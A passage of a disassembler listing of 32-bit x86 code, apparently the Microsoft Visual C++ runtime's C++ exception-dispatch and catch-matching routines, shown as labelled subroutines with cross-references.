		mov	ebp, esp
		sub	esp, 0Ch
		test	edi, edi
		jnz	short loc_40BA0F
		call	sub_40C465
		jmp	sub_40C419
; ---------------------------------------------------------------------------

loc_40BA0F:				; CODE XREF: sub_40B9FB+8j
		and	[ebp+var_8], 0
		cmp	dword ptr [edi], 0
		mov	[ebp+var_1], 0
		jle	short loc_40BA6F
		push	ebx
		push	esi

loc_40BA1E:				; CODE XREF: sub_40B9FB+70j
		mov	eax, [ebp+arg_0]
		mov	eax, [eax+1Ch]
		mov	eax, [eax+0Ch]
		mov	ebx, [eax]
		test	ebx, ebx
		lea	esi, [eax+4]
		jle	short loc_40BA63
		mov	eax, [ebp+var_8]
		shl	eax, 4
		mov	[ebp+var_C], eax

loc_40BA39:				; CODE XREF: sub_40B9FB+60j
		mov	ecx, [ebp+arg_0]
		push	dword ptr [ecx+1Ch]
		mov	eax, [esi]
		push	eax
		mov	eax, [edi+4]
		add	eax, [ebp+var_C]
		push	eax
		call	sub_40B7BC
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_40BA5F
		dec	ebx
		add	esi, 4
		test	ebx, ebx
		jg	short loc_40BA39
		jmp	short loc_40BA63
; ---------------------------------------------------------------------------

loc_40BA5F:				; CODE XREF: sub_40B9FB+58j
		mov	[ebp+var_1], 1

loc_40BA63:				; CODE XREF: sub_40B9FB+33j
					; sub_40B9FB+62j
		inc	[ebp+var_8]
		mov	eax, [ebp+var_8]
		cmp	eax, [edi]
		jl	short loc_40BA1E
		pop	esi
		pop	ebx

loc_40BA6F:				; CODE XREF: sub_40B9FB+1Fj
		mov	al, [ebp+var_1]
		leave
		retn
sub_40B9FB	endp


; =============== S U B	R O U T	I N E =======================================



sub_40BA74	proc near		; CODE XREF: sub_40BFC7+30Ap
		push	4
		mov	eax, offset loc_41CDAE
		call	sub_404BBF
		call	sub_40595D
		cmp	dword ptr [eax+94h], 0
		jz	short loc_40BA93
		call	sub_40C465

loc_40BA93:				; CODE XREF: sub_40BA74+18j
		and	dword ptr [ebp-4], 0
		call	sub_40C452
		or	dword ptr [ebp-4], 0FFFFFFFFh
		jmp	sub_40C419
sub_40BA74	endp


; =============== S U B	R O U T	I N E =======================================



sub_40BAA5	proc near		; DATA XREF: jlrllt49:00422BA0o
		call	sub_40595D
		mov	ecx, [ebp+8]
		push	0
		push	0
		mov	[eax+94h], ecx
		call	sub_40477B
		int	3		; Trap to Debugger
sub_40BAA5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BABD	proc near		; CODE XREF: sub_40BE69+57p

var_3C		= byte ptr -3Ch
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

; FUNCTION CHUNK AT 0040BBD8 SIZE 00000005 BYTES

		push	2Ch
		push	offset dword_422BF0
		call	__SEH_prolog4
		mov	ebx, ecx
		mov	edi, [ebp+arg_4]
		mov	esi, [ebp+arg_0]
		mov	[ebp+var_1C], ebx
		and	[ebp+var_34], 0
		mov	eax, [edi-4]
		mov	[ebp+var_24], eax
		push	dword ptr [esi+18h]
		lea	eax, [ebp+var_3C]
		push	eax
		call	sub_404A99
		pop	ecx
		pop	ecx
		mov	[ebp+var_28], eax
		call	sub_40595D
		mov	eax, [eax+88h]
		mov	[ebp+var_2C], eax
		call	sub_40595D
		mov	eax, [eax+8Ch]
		mov	[ebp+var_30], eax
		call	sub_40595D
		mov	[eax+88h], esi
		call	sub_40595D
		mov	ecx, [ebp+arg_8]
		mov	[eax+8Ch], ecx
		and	[ebp+ms_exc.disabled], 0
		xor	eax, eax
		inc	eax
		mov	[ebp+arg_8], eax
		mov	[ebp+ms_exc.disabled], eax
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	ebx
		push	[ebp+arg_C]
		push	edi
		call	sub_404B2E
		add	esp, 14h
		mov	[ebp+var_1C], eax
		and	[ebp+ms_exc.disabled], 0
		jmp	short loc_40BBBC
; ---------------------------------------------------------------------------

loc_40BB4D:				; DATA XREF: jlrllt49:00422C10o
		mov	eax, [ebp+ms_exc.exc_ptr]
		call	sub_40B93D
		retn
; ---------------------------------------------------------------------------

loc_40BB56:				; DATA XREF: jlrllt49:00422C14o
		mov	esp, [ebp+ms_exc.old_esp]
		call	sub_40595D
		and	dword ptr [eax+20Ch], 0
		mov	esi, [ebp+arg_C]
		mov	edi, [ebp+arg_4]
		cmp	dword ptr [esi+4], 80h
		jg	short loc_40BB7A
		movsx	ecx, byte ptr [edi+8]
		jmp	short loc_40BB7D
; ---------------------------------------------------------------------------

loc_40BB7A:				; CODE XREF: sub_40BABD+B5j
		mov	ecx, [edi+8]

loc_40BB7D:				; CODE XREF: sub_40BABD+BBj
		mov	ebx, [esi+10h]
		and	[ebp+var_20], 0

loc_40BB84:				; CODE XREF: sub_40BABD+11Ej
		mov	eax, [ebp+var_20]
		cmp	eax, [esi+0Ch]
		jnb	short loc_40BBA4
		imul	eax, 14h
		add	eax, ebx
		mov	edx, [eax+4]
		cmp	ecx, edx
		jle	short loc_40BBD8
		cmp	ecx, [eax+8]
		jg	short loc_40BBD8
		mov	eax, [esi+8]
		mov	ecx, [eax+edx*8+8]

loc_40BBA4:				; CODE XREF: sub_40BABD+CDj
		push	ecx
		push	esi
		push	0
		push	edi
		call	sub_40B85C
		add	esp, 10h
		and	[ebp+var_1C], 0
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [ebp+arg_0]

loc_40BBBC:				; CODE XREF: sub_40BABD+8Ej
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	[ebp+arg_8], 0
		call	sub_40BBE3
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40BABD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40BABD

loc_40BBD8:				; CODE XREF: sub_40BABD+D9j
					; sub_40BABD+DEj
		inc	[ebp+var_20]
		jmp	short loc_40BB84
; END OF FUNCTION CHUNK	FOR sub_40BABD

; =============== S U B	R O U T	I N E =======================================



sub_40BBDD	proc near		; DATA XREF: jlrllt49:00422C08o
		mov	edi, [ebp+0Ch]
		mov	esi, [ebp+8]
sub_40BBDD	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40BBE3	proc near		; CODE XREF: sub_40BABD+10Dp
		mov	eax, [ebp-24h]
		mov	[edi-4], eax
		push	dword ptr [ebp-28h]
		call	sub_404AE2
		pop	ecx
		call	sub_40595D
		mov	ecx, [ebp-2Ch]
		mov	[eax+88h], ecx
		call	sub_40595D
		mov	ecx, [ebp-30h]
		mov	[eax+8Ch], ecx
		cmp	dword ptr [esi], 0E06D7363h
		jnz	short locret_40BC58
		cmp	dword ptr [esi+10h], 3
		jnz	short locret_40BC58
		mov	eax, [esi+14h]
		cmp	eax, 19930520h
		jz	short loc_40BC34
		cmp	eax, 19930521h
		jz	short loc_40BC34
		cmp	eax, 19930522h
		jnz	short locret_40BC58

loc_40BC34:				; CODE XREF: sub_40BBE3+41j
					; sub_40BBE3+48j
		cmp	dword ptr [ebp-34h], 0
		jnz	short locret_40BC58
		cmp	dword ptr [ebp-1Ch], 0
		jz	short locret_40BC58
		push	dword ptr [esi+18h]
		call	sub_404AC1
		pop	ecx
		test	eax, eax
		jz	short locret_40BC58
		push	dword ptr [ebp+10h]
		push	esi
		call	sub_40B982
		pop	ecx
		pop	ecx

locret_40BC58:				; CODE XREF: sub_40BBE3+31j
					; sub_40BBE3+37j ...
		retn
sub_40BBE3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BC59	proc near		; CODE XREF: sub_40BDD8+36p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	0Ch
		push	offset dword_422C18
		call	__SEH_prolog4
		xor	edx, edx
		mov	[ebp+var_1C], edx
		mov	eax, [ebp+arg_8]
		mov	ecx, [eax+4]
		cmp	ecx, edx
		jz	loc_40BDD0
		cmp	[ecx+8], dl
		jz	loc_40BDD0
		mov	ecx, [eax+8]
		cmp	ecx, edx
		jnz	short loc_40BC94
		test	dword ptr [eax], 80000000h
		jz	loc_40BDD0

loc_40BC94:				; CODE XREF: sub_40BC59+2Dj
		mov	eax, [eax]
		mov	esi, [ebp+arg_4]
		test	eax, eax
		js	short loc_40BCA1
		lea	esi, [ecx+esi+0Ch]

loc_40BCA1:				; CODE XREF: sub_40BC59+42j
		mov	[ebp+ms_exc.disabled], edx
		xor	ebx, ebx
		inc	ebx
		push	ebx
		test	al, 8
		jz	short loc_40BCED
		mov	edi, [ebp+arg_0]
		push	dword ptr [edi+18h]
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BDB3
		push	ebx
		push	esi
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BDB3
		mov	eax, [edi+18h]
		mov	[esi], eax
		mov	ecx, [ebp+arg_C]
		add	ecx, 8
		push	ecx

loc_40BCDE:				; CODE XREF: sub_40BC59+E7j
		push	eax
		call	sub_40B9D6
		pop	ecx
		pop	ecx
		mov	[esi], eax
		jmp	loc_40BDB8
; ---------------------------------------------------------------------------

loc_40BCED:				; CODE XREF: sub_40BC59+51j
		mov	edi, [ebp+arg_C]
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+18h]
		test	[edi], bl
		jz	short loc_40BD42
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BDB3
		push	ebx
		push	esi
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BDB3
		push	dword ptr [edi+14h]
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+18h]
		push	esi
		call	sub_407930
		add	esp, 0Ch
		cmp	dword ptr [edi+14h], 4
		jnz	loc_40BDB8
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_40BDB8
		add	edi, 8
		push	edi
		jmp	short loc_40BCDE
; ---------------------------------------------------------------------------

loc_40BD42:				; CODE XREF: sub_40BC59+9Fj
		cmp	[edi+18h], edx
		jnz	short loc_40BD7F
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BDB3
		push	ebx
		push	esi
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BDB3
		push	dword ptr [edi+14h]
		add	edi, 8
		push	edi
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+18h]
		call	sub_40B9D6
		pop	ecx
		pop	ecx
		push	eax
		push	esi
		call	sub_407930
		add	esp, 0Ch
		jmp	short loc_40BDB8
; ---------------------------------------------------------------------------

loc_40BD7F:				; CODE XREF: sub_40BC59+ECj
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BDB3
		push	ebx
		push	esi
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BDB3
		push	dword ptr [edi+18h]
		call	sub_410770
		pop	ecx
		test	eax, eax
		jz	short loc_40BDB3
		test	byte ptr [edi],	4
		push	0
		pop	eax
		setnz	al
		inc	eax
		mov	[ebp+var_1C], eax
		jmp	short loc_40BDB8
; ---------------------------------------------------------------------------

loc_40BDB3:				; CODE XREF: sub_40BC59+62j
					; sub_40BC59+73j ...
		call	sub_40C465

loc_40BDB8:				; CODE XREF: sub_40BC59+8Fj
					; sub_40BC59+D7j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	eax, [ebp+var_1C]
		jmp	short loc_40BDD2
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		jmp	sub_40C419
; ---------------------------------------------------------------------------

loc_40BDD0:				; CODE XREF: sub_40BC59+19j
					; sub_40BC59+22j ...
		xor	eax, eax

loc_40BDD2:				; CODE XREF: sub_40BC59+169j
		call	__SEH_epilog4
		retn
sub_40BC59	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BDD8	proc near		; CODE XREF: sub_40BE69+11p

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	8
		push	offset dword_422C38
		call	__SEH_prolog4
		mov	eax, [ebp+arg_8]
		test	dword ptr [eax], 80000000h
		jz	short loc_40BDF4
		mov	ebx, [ebp+arg_4]
		jmp	short loc_40BDFE
; ---------------------------------------------------------------------------

loc_40BDF4:				; CODE XREF: sub_40BDD8+15j
		mov	ecx, [eax+8]
		mov	edx, [ebp+arg_4]
		lea	ebx, [ecx+edx+0Ch]

loc_40BDFE:				; CODE XREF: sub_40BDD8+1Aj
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [ebp+arg_C]
		push	esi
		push	eax
		push	[ebp+arg_4]
		mov	edi, [ebp+arg_0]
		push	edi
		call	sub_40BC59
		add	esp, 10h
		dec	eax
		jz	short loc_40BE38
		dec	eax
		jnz	short loc_40BE50
		push	1
		lea	eax, [esi+8]
		push	eax
		push	dword ptr [edi+18h]
		call	sub_40B9D6
		pop	ecx
		pop	ecx
		push	eax
		push	dword ptr [esi+18h]
		push	ebx
		call	sub_4047F5
		jmp	short loc_40BE50
; ---------------------------------------------------------------------------

loc_40BE38:				; CODE XREF: sub_40BDD8+3Fj
		lea	eax, [esi+8]
		push	eax
		push	dword ptr [edi+18h]
		call	sub_40B9D6
		pop	ecx
		pop	ecx
		push	eax
		push	dword ptr [esi+18h]
		push	ebx
		call	sub_4047F5

loc_40BE50:				; CODE XREF: sub_40BDD8+42j
					; sub_40BDD8+5Ej
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	__SEH_epilog4
		retn
sub_40BDD8	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		jmp	sub_40C419

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BE69	proc near		; CODE XREF: sub_40BED5+D4p
					; sub_40BFC7+25Dp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		cmp	[ebp+arg_10], 0
		jz	short loc_40BE82
		push	[ebp+arg_10]
		push	ebx
		push	esi
		push	[ebp+arg_0]
		call	sub_40BDD8
		add	esp, 10h

loc_40BE82:				; CODE XREF: sub_40BE69+7j
		cmp	[ebp+arg_18], 0
		push	[ebp+arg_0]
		jnz	short loc_40BE8E
		push	esi
		jmp	short loc_40BE91
; ---------------------------------------------------------------------------

loc_40BE8E:				; CODE XREF: sub_40BE69+20j
		push	[ebp+arg_18]

loc_40BE91:				; CODE XREF: sub_40BE69+23j
		call	sub_4047FC
		push	dword ptr [edi]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	esi
		call	sub_40B85C
		mov	eax, [edi+4]
		push	100h
		push	[ebp+arg_14]
		inc	eax
		push	[ebp+arg_C]
		mov	[esi+8], eax
		push	[ebp+arg_4]
		mov	ecx, [ebx+0Ch]
		push	esi
		push	[ebp+arg_0]
		call	sub_40BABD
		add	esp, 28h
		test	eax, eax
		jz	short loc_40BED3
		push	esi
		push	eax
		call	sub_4047C5

loc_40BED3:				; CODE XREF: sub_40BE69+61j
		pop	ebp
		retn
sub_40BE69	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BED5	proc near		; CODE XREF: sub_40BFC7+336p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	esi
		mov	esi, [ebp+arg_0]
		cmp	dword ptr [esi], 80000003h
		jz	loc_40BFC4
		push	edi
		call	sub_40595D
		cmp	dword ptr [eax+80h], 0
		jz	short loc_40BF38
		call	sub_40595D
		lea	edi, [eax+80h]
		call	sub_40574A
		cmp	[edi], eax
		jz	short loc_40BF38
		cmp	dword ptr [esi], 0E0434F4Dh
		jz	short loc_40BF38
		push	[ebp+arg_1C]
		push	[ebp+arg_18]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	esi
		call	sub_4048B4
		add	esp, 1Ch
		test	eax, eax
		jnz	loc_40BFC3

loc_40BF38:				; CODE XREF: sub_40BED5+22j
					; sub_40BED5+36j ...
		mov	edi, [ebp+arg_10]
		cmp	dword ptr [edi+0Ch], 0
		jnz	short loc_40BF46
		call	sub_40C465

loc_40BF46:				; CODE XREF: sub_40BED5+6Aj
		mov	esi, [ebp+arg_14]
		lea	eax, [ebp+var_8]
		push	eax
		lea	eax, [ebp+var_4]
		push	eax
		push	esi
		push	[ebp+arg_18]
		push	edi
		call	sub_404A26
		mov	edi, eax
		mov	eax, [ebp+var_4]
		add	esp, 14h
		cmp	eax, [ebp+var_8]
		jnb	short loc_40BFC3
		push	ebx

loc_40BF69:				; CODE XREF: sub_40BED5+EBj
		cmp	esi, [edi]
		jl	short loc_40BFB4
		cmp	esi, [edi+4]
		jg	short loc_40BFB4
		mov	eax, [edi+0Ch]
		mov	ecx, [edi+10h]
		shl	eax, 4
		add	eax, ecx
		mov	ecx, [eax-0Ch]
		test	ecx, ecx
		jz	short loc_40BF8A
		cmp	byte ptr [ecx+8], 0
		jnz	short loc_40BFB4

loc_40BF8A:				; CODE XREF: sub_40BED5+ADj
		lea	ebx, [eax-10h]
		test	byte ptr [ebx],	40h
		jnz	short loc_40BFB4
		push	[ebp+arg_1C]
		mov	esi, [ebp+arg_4]
		push	[ebp+arg_18]
		push	0
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_0]
		call	sub_40BE69
		mov	esi, [ebp+arg_14]
		add	esp, 1Ch

loc_40BFB4:				; CODE XREF: sub_40BED5+96j
					; sub_40BED5+9Bj ...
		inc	[ebp+var_4]
		mov	eax, [ebp+var_4]
		add	edi, 14h
		cmp	eax, [ebp+var_8]
		jb	short loc_40BF69
		pop	ebx

loc_40BFC3:				; CODE XREF: sub_40BED5+5Dj
					; sub_40BED5+91j
		pop	edi

loc_40BFC4:				; CODE XREF: sub_40BED5+Fj
		pop	esi
		leave
		retn
sub_40BED5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BFC7	proc near		; CODE XREF: sub_40C335+D4p

var_2C		= dword	ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= byte ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	ecx, [ebp+arg_4]
		push	ebx
		mov	ebx, [ebp+arg_10]
		mov	eax, [ebx+4]
		cmp	eax, 80h
		push	esi
		push	edi
		mov	[ebp+var_1], 0
		jg	short loc_40BFEA
		movsx	ecx, byte ptr [ecx+8]
		jmp	short loc_40BFED
; ---------------------------------------------------------------------------

loc_40BFEA:				; CODE XREF: sub_40BFC7+1Bj
		mov	ecx, [ecx+8]

loc_40BFED:				; CODE XREF: sub_40BFC7+21j
		cmp	ecx, 0FFFFFFFFh
		mov	[ebp+var_8], ecx
		jl	short loc_40BFF9
		cmp	ecx, eax
		jl	short loc_40BFFE

loc_40BFF9:				; CODE XREF: sub_40BFC7+2Cj
		call	sub_40C465

loc_40BFFE:				; CODE XREF: sub_40BFC7+30j
		mov	esi, [ebp+arg_0]
		mov	edi, 0E06D7363h
		cmp	[esi], edi
		jnz	loc_40C2D9
		cmp	dword ptr [esi+10h], 3
		mov	ebx, 19930520h
		jnz	loc_40C146
		mov	eax, [esi+14h]
		cmp	eax, ebx
		jz	short loc_40C036
		cmp	eax, 19930521h
		jz	short loc_40C036
		cmp	eax, 19930522h
		jnz	loc_40C146

loc_40C036:				; CODE XREF: sub_40BFC7+5Bj
					; sub_40BFC7+62j
		cmp	dword ptr [esi+1Ch], 0
		jnz	loc_40C146
		call	sub_40595D
		cmp	dword ptr [eax+88h], 0
		jz	loc_40C318
		call	sub_40595D
		mov	esi, [eax+88h]
		mov	[ebp+arg_0], esi
		call	sub_40595D
		mov	eax, [eax+8Ch]
		push	1
		push	esi
		mov	[ebp+arg_8], eax
		call	sub_410770
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_40C081
		call	sub_40C465

loc_40C081:				; CODE XREF: sub_40BFC7+B3j
		cmp	[esi], edi
		jnz	short loc_40C0AB
		cmp	dword ptr [esi+10h], 3
		jnz	short loc_40C0AB
		mov	eax, [esi+14h]
		cmp	eax, ebx
		jz	short loc_40C0A0
		cmp	eax, 19930521h
		jz	short loc_40C0A0
		cmp	eax, 19930522h
		jnz	short loc_40C0AB

loc_40C0A0:				; CODE XREF: sub_40BFC7+C9j
					; sub_40BFC7+D0j
		cmp	dword ptr [esi+1Ch], 0
		jnz	short loc_40C0AB
		call	sub_40C465

loc_40C0AB:				; CODE XREF: sub_40BFC7+BCj
					; sub_40BFC7+C2j ...
		call	sub_40595D
		cmp	dword ptr [eax+94h], 0
		jz	loc_40C146
		call	sub_40595D
		mov	edi, [eax+94h]
		call	sub_40595D
		push	[ebp+arg_0]
		xor	esi, esi
		mov	[eax+94h], esi
		call	sub_40B9FB
		test	al, al
		pop	ecx
		jnz	short loc_40C13E
		xor	ebx, ebx
		cmp	[edi], ebx
		jle	short loc_40C105

loc_40C0E8:				; CODE XREF: sub_40BFC7+13Cj
		mov	eax, [edi+4]
		mov	ecx, [ebx+eax+4]
		push	offset off_424E50
		call	sub_4035A5
		test	al, al
		jnz	short loc_40C10A
		inc	esi
		add	ebx, 10h
		cmp	esi, [edi]
		jl	short loc_40C0E8

loc_40C105:				; CODE XREF: sub_40BFC7+11Fj
					; sub_40BFC7+31Cj
		jmp	sub_40C419
; ---------------------------------------------------------------------------

loc_40C10A:				; CODE XREF: sub_40BFC7+134j
		push	1
		push	[ebp+arg_0]
		call	sub_40B982
		pop	ecx
		pop	ecx
		lea	eax, [ebp+arg_0]
		push	eax
		lea	ecx, [ebp+var_2C]
		mov	[ebp+arg_0], offset dword_41EC4C
		call	sub_40319A
		push	offset dword_422C54
		lea	eax, [ebp+var_2C]
		push	eax
		mov	[ebp+var_2C], offset off_41EC44
		call	sub_40477B

loc_40C13E:				; CODE XREF: sub_40BFC7+119j
		mov	esi, [ebp+arg_0]
		mov	edi, 0E06D7363h

loc_40C146:				; CODE XREF: sub_40BFC7+50j
					; sub_40BFC7+69j ...
		cmp	[esi], edi
		jnz	loc_40C2D6
		cmp	dword ptr [esi+10h], 3
		jnz	loc_40C2D6
		mov	eax, [esi+14h]
		cmp	eax, ebx
		jz	short loc_40C171
		cmp	eax, 19930521h
		jz	short loc_40C171
		cmp	eax, 19930522h
		jnz	loc_40C2D6

loc_40C171:				; CODE XREF: sub_40BFC7+196j
					; sub_40BFC7+19Dj
		mov	edi, [ebp+arg_10]
		cmp	dword ptr [edi+0Ch], 0
		jbe	loc_40C23D
		lea	eax, [ebp+var_1C]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		push	[ebp+var_8]
		push	[ebp+arg_18]
		push	edi
		call	sub_404A26
		add	esp, 14h
		mov	edi, eax

loc_40C197:				; CODE XREF: sub_40BFC7+26Ej
		mov	eax, [ebp+var_10]
		cmp	eax, [ebp+var_1C]
		jnb	loc_40C23A
		mov	eax, [ebp+var_8]
		cmp	[edi], eax
		jg	loc_40C22F
		cmp	eax, [edi+4]
		jg	short loc_40C22F
		mov	eax, [edi+10h]
		mov	[ebp+var_C], eax
		mov	eax, [edi+0Ch]
		test	eax, eax
		mov	[ebp+var_18], eax
		jle	short loc_40C22F

loc_40C1C3:				; CODE XREF: sub_40BFC7+23Cj
		mov	eax, [esi+1Ch]
		mov	eax, [eax+0Ch]
		lea	ebx, [eax+4]
		mov	eax, [eax]
		test	eax, eax
		mov	[ebp+var_14], eax
		jle	short loc_40C1F8

loc_40C1D5:				; CODE XREF: sub_40BFC7+22Fj
		push	dword ptr [esi+1Ch]
		mov	eax, [ebx]
		push	eax
		push	[ebp+var_C]
		mov	[ebp+var_20], eax
		call	sub_40B7BC
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_40C207
		dec	[ebp+var_14]
		add	ebx, 4
		cmp	[ebp+var_14], eax
		jg	short loc_40C1D5

loc_40C1F8:				; CODE XREF: sub_40BFC7+20Cj
		dec	[ebp+var_18]
		add	[ebp+var_C], 10h
		cmp	[ebp+var_18], 0
		jg	short loc_40C1C3
		jmp	short loc_40C22F
; ---------------------------------------------------------------------------

loc_40C207:				; CODE XREF: sub_40BFC7+224j
		push	[ebp+arg_1C]
		mov	ebx, [ebp+var_C]
		push	[ebp+arg_18]
		mov	[ebp+var_1], 1
		push	[ebp+var_20]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	esi
		mov	esi, [ebp+arg_4]
		call	sub_40BE69
		mov	esi, [ebp+arg_0]
		add	esp, 1Ch

loc_40C22F:				; CODE XREF: sub_40BFC7+1E1j
					; sub_40BFC7+1EAj ...
		inc	[ebp+var_10]
		add	edi, 14h
		jmp	loc_40C197
; ---------------------------------------------------------------------------

loc_40C23A:				; CODE XREF: sub_40BFC7+1D6j
		mov	edi, [ebp+arg_10]

loc_40C23D:				; CODE XREF: sub_40BFC7+1B1j
		cmp	[ebp+arg_14], 0
		jz	short loc_40C24D
		push	1
		push	esi
		call	sub_40B982
		pop	ecx
		pop	ecx

loc_40C24D:				; CODE XREF: sub_40BFC7+27Aj
		cmp	[ebp+var_1], 0
		jnz	loc_40C305
		mov	eax, [edi]
		and	eax, 1FFFFFFFh
		cmp	eax, 19930521h
		jb	loc_40C305
		mov	edi, [edi+1Ch]
		test	edi, edi
		jz	loc_40C305
		push	esi
		call	sub_40B9FB
		test	al, al
		pop	ecx
		jnz	loc_40C305
		call	sub_40595D
		call	sub_40595D
		call	sub_40595D
		mov	[eax+88h], esi
		call	sub_40595D
		cmp	[ebp+arg_1C], 0
		mov	ecx, [ebp+arg_8]
		mov	[eax+8Ch], ecx
		push	esi
		jnz	short loc_40C2B2
		push	[ebp+arg_4]
		jmp	short loc_40C2B5
; ---------------------------------------------------------------------------

loc_40C2B2:				; CODE XREF: sub_40BFC7+2E4j
		push	[ebp+arg_1C]

loc_40C2B5:				; CODE XREF: sub_40BFC7+2E9j
		call	sub_4047FC
		mov	esi, [ebp+arg_10]
		push	0FFFFFFFFh
		push	esi
		push	[ebp+arg_C]
		push	[ebp+arg_4]
		call	sub_40B85C
		add	esp, 10h
		push	dword ptr [esi+1Ch]
		call	sub_40BA74

loc_40C2D6:				; CODE XREF: sub_40BFC7+181j
					; sub_40BFC7+18Bj ...
		mov	ebx, [ebp+arg_10]

loc_40C2D9:				; CODE XREF: sub_40BFC7+41j
		cmp	dword ptr [ebx+0Ch], 0
		jbe	short loc_40C305
		cmp	[ebp+arg_14], 0
		jnz	loc_40C105
		push	[ebp+arg_1C]
		push	[ebp+arg_18]
		push	[ebp+var_8]
		push	ebx
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	esi
		call	sub_40BED5
		add	esp, 20h

loc_40C305:				; CODE XREF: sub_40BFC7+28Aj
					; sub_40BFC7+29Cj ...
		call	sub_40595D
		cmp	dword ptr [eax+94h], 0
		jz	short loc_40C318
		call	sub_40C465

loc_40C318:				; CODE XREF: sub_40BFC7+85j
					; sub_40BFC7+34Aj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40BFC7	endp

; ---------------------------------------------------------------------------
		push	esi
		push	dword ptr [esp+8]
		mov	esi, ecx
		call	sub_403200
		mov	dword ptr [esi], offset	off_41EC44
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C335	proc near		; CODE XREF: sub_40484E+21p
					; .text:004048AAp ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		push	edi
		call	sub_40595D
		cmp	dword ptr [eax+20Ch], 0
		mov	eax, [ebp+arg_10]
		mov	ecx, [ebp+arg_0]
		mov	edi, 0E06D7363h
		mov	esi, 1FFFFFFFh
		mov	ebx, 19930522h
